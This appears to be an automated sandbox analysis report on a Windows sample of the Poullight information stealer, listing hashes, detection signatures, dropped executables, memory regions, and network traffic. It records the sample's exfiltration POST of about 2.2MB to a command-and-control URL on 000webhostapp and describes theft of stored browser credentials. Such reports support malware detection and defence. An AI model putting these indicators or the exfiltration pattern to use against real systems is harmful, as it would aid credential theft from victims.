Analysis

  • max time kernel
    190s
  • max time network
    184s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08/05/2022, 06:15 UTC

General

  • Target

    edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe

  • Size

    151KB

  • MD5

    9343386c659f66a4ddf860b64cf1fc55

  • SHA1

    9977986d2c647a9a51ec2a777d510d77f6006232

  • SHA256

    edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309

  • SHA512

    0a0a13acd2677fa5584dbc54bfe88358ffd8288002c6c23c9e3f7995d5b10c19fee588daf0df2a5030559af7c820d7a36b0f62aed6e514343769d0873256fd6b

Malware Config

Signatures

  • Poullight

    Poullight is an information stealer first seen in March 2020.

  • Poullight Stealer Payload 3 IoCs
  • suricata: ET MALWARE Likely Malware CnC Hosted on 000webhostapp - POST to gate.php
  • suricata: ET MALWARE Matrix Max Stealer Exfiltration Observed
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
  • suricata: ET MALWARE Win32/X-Files Stealer Activity

  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe
    "C:\Users\Admin\AppData\Local\Temp\edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe
      "C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe"
      2⤵
      • Executes dropped EXE
      PID:3864
    • C:\Users\Admin\AppData\Local\Temp\webhost.exe
      "C:\Users\Admin\AppData\Local\Temp\webhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5032
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 5032 -s 1832
        3⤵
        • Program crash
        PID:3964
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 444 -p 5032 -ip 5032
    1⤵
    PID:3960

Network

    • flag-us
      DNS
      skai1234.000webhostapp.com
      webhost.exe
      Remote address:
      8.8.8.8:53
      Request
      skai1234.000webhostapp.com
      IN A
      Response
      skai1234.000webhostapp.com
      IN CNAME
      us-east-1.route-1.000webhost.awex.io
      us-east-1.route-1.000webhost.awex.io
      IN A
      145.14.144.173
    • flag-us
      DNS
      97.97.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.97.242.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.101.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.101.242.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      https://skai1234.000webhostapp.com/pog/gate.php
      webhost.exe
      Remote address:
      145.14.144.173:443
      Request
      POST /pog/gate.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: skai1234.000webhostapp.com
      Content-Length: 2113588
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 08 May 2022 09:12:22 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Server: awex
      X-Xss-Protection: 1; mode=block
      X-Content-Type-Options: nosniff
      X-Request-ID: b55626a6d7561b6e11d94122fc167534
    • flag-us
      DNS
      ru-uid-507352920.pp.ru
      webhost.exe
      Remote address:
      8.8.8.8:53
      Request
      ru-uid-507352920.pp.ru
      IN A
      Response
    • 67.26.205.254:80
      322 B
      7
    • 67.26.205.254:80
      322 B
      7
    • 20.42.65.88:443
      322 B
      7
    • 67.26.205.254:80
      322 B
      7
    • 67.26.205.254:80
      322 B
      7
    • 67.26.205.254:80
      322 B
      7
    • 145.14.144.173:443
      skai1234.000webhostapp.com
      webhost.exe
      260 B
      5
    • 145.14.144.173:443
      skai1234.000webhostapp.com
      tls
      webhost.exe
      372 B
      132 B
      4
      3
    • 145.14.144.173:443
      https://skai1234.000webhostapp.com/pog/gate.php
      tls, http
      webhost.exe
      2.2MB
      54.2kB
      1595
      1127

      HTTP Request

      POST https://skai1234.000webhostapp.com/pog/gate.php

      HTTP Response

      200
    • 8.8.8.8:53
      skai1234.000webhostapp.com
      dns
      webhost.exe
      72 B
      138 B
      1
      1

      DNS Request

      skai1234.000webhostapp.com

      DNS Response

      145.14.144.173

    • 8.8.8.8:53
      97.97.242.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      97.97.242.52.in-addr.arpa

    • 8.8.8.8:53
      226.101.242.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      226.101.242.52.in-addr.arpa

    • 8.8.8.8:53
      ru-uid-507352920.pp.ru
      dns
      webhost.exe
      68 B
      141 B
      1
      1

      DNS Request

      ru-uid-507352920.pp.ru

MITRE ATT&CK Enterprise v6

Downloads

    • C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe

      Filesize

      9KB

      MD5

      b95f17b473384cecf82f66c6a0e2e50c

      SHA1

      b232c45654c6cf7bc912c8f02cd86a31289ec2ab

      SHA256

      c38d762ec06d3fe74de40cbd46bab3989d14cfe2e83b8c63077a3602f8a7a3da

      SHA512

      29840efd18f7b3fe7702bb147e58a62193ae16f33dca206bf008dface5281a69a60a3c678b5748f2443362801b9334cb518aaba39f49f0880d5d7d525a6cf936

    • C:\Users\Admin\AppData\Local\Temp\webhost.exe

      Filesize

      97KB

      MD5

      4813c32e67f6a4f67b995068c3fa7445

      SHA1

      e5e4a2d10c3ea17a3c75e54cd08cad97f40526aa

      SHA256

      0dce39e05706807ad8222360c440b8ef612198fd350bced53bd8ffe69f62cad8

      SHA512

      5d3b1707115511656178a684ffd680661983fef751f9bb4973a4dcb13439c0ff71203441b392dec7c7fec4a9392e3317f40aa76d333bf272c80d6b8966c3f4e1

    • memory/3864-138-0x0000000000270000-0x0000000000278000-memory.dmp

      Filesize

      32KB

    • memory/4264-131-0x0000000005E90000-0x0000000006434000-memory.dmp

      Filesize

      5.6MB

    • memory/4264-132-0x0000000005980000-0x0000000005A12000-memory.dmp

      Filesize

      584KB

    • memory/4264-133-0x0000000005960000-0x000000000596A000-memory.dmp

      Filesize

      40KB

    • memory/4264-130-0x0000000000F80000-0x0000000000F88000-memory.dmp

      Filesize

      32KB

    • memory/5032-141-0x000002186A870000-0x000002186A88E000-memory.dmp

      Filesize

      120KB

    • memory/5032-142-0x00007FFB121F0000-0x00007FFB12CB1000-memory.dmp

      Filesize

      10.8MB

    • memory/5032-143-0x000002186C580000-0x000002186C58A000-memory.dmp

      Filesize

      40KB

    • memory/5032-144-0x000002186EF30000-0x000002186F0F2000-memory.dmp

      Filesize

      1.8MB

    • memory/5032-145-0x000002186F630000-0x000002186FB58000-memory.dmp

      Filesize

      5.2MB

    • memory/5032-146-0x000002186DEE0000-0x000002186DEF2000-memory.dmp

      Filesize

      72KB